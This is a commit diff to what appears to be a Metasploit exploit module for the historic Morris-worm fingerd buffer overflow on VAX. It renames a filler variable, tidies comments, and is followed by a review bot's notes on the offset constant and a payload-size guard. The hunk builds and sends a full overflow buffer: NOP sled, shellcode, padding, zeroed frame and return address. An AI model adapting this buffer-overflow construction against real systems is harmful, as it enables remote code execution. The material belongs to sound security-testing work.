Explain "junk" in buffer for morris_fingerd_bof
And unrelated whitespace changes because I suck.
GSoC/Meterpreter_Web_Console
parent
f2f5b3c8fa
commit
8a402da056
|
@ -85,24 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# 0x01 is NOP in VAX-speak
|
# 0x01 is NOP in VAX-speak
|
||||||
nops = "\x01" * (target.payload_space - shellcode.length)
|
nops = "\x01" * (target.payload_space - shellcode.length)
|
||||||
|
|
||||||
# This overwrites part of the buffer
|
# This pads past buffer corruption
|
||||||
junk = rand_text_alphanumeric(109)
|
padding = rand_text_alphanumeric(109)
|
||||||
|
|
||||||
# This zeroes out part of the stack frame
|
# This zeroes out part of the stack frame
|
||||||
frame = "\x00" * 16
|
frame = "\x00" * 16
|
||||||
|
|
||||||
# Finally, pack in our return address
|
# Finally, pack in our return address
|
||||||
ret = [target.ret].pack('V') # V is for VAX!
|
ret = [target.ret].pack('V') # V is for VAX!
|
||||||
|
|
||||||
# The newline is for gets(3)
|
# The newline is for gets(3)
|
||||||
sploit = nops + shellcode + junk + frame + ret + "\n"
|
sploit = nops + shellcode + padding + frame + ret + "\n"
|
||||||
|
|
||||||
# Fire away
|
# Fire away
|
||||||
print_status('Connecting to fingerd')
|
print_status('Connecting to fingerd')
|
||||||
connect
|
connect
|
||||||
print_status("Sending #{sploit.length}-byte buffer")
|
print_status("Sending #{sploit.length}-byte buffer")
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
||||||
# Hat tip @bcoles
|
# Hat tip @bcoles
|
||||||
rescue Rex::ConnectionError => e
|
rescue Rex::ConnectionError => e
|
||||||
fail_with(Failure::Unreachable, e.message)
|
fail_with(Failure::Unreachable, e.message)
|
||||||
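Review bot: The reworded comment above `padding = rand_text_alphanumeric(109)` still leaves the 109 unexplained, and that constant only works in combination with `target.payload_space` — the filler has to carry the overwrite from the end of the payload space up to the 16 zero bytes and `ret`, so a target with a different payload_space would silently break the offset. I would state the dependency in the comment, e.g. `# Filler between the end of the payload space and the saved frame; 109 assumes target.payload_space, so change both together`, or derive the length from a named per-target offset if the targets table carries one. Separately, `"\x01" * (target.payload_space - shellcode.length)` raises ArgumentError on a negative count if a payload ever exceeds payload_space; the framework's space check presumably prevents that, but an explicit `fail_with(Failure::BadConfig, 'payload exceeds payload_space')` guard would make the failure legible. The `rescue Rex::ConnectionError` belongs to a method whose beginning is outside the hunk.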
|
|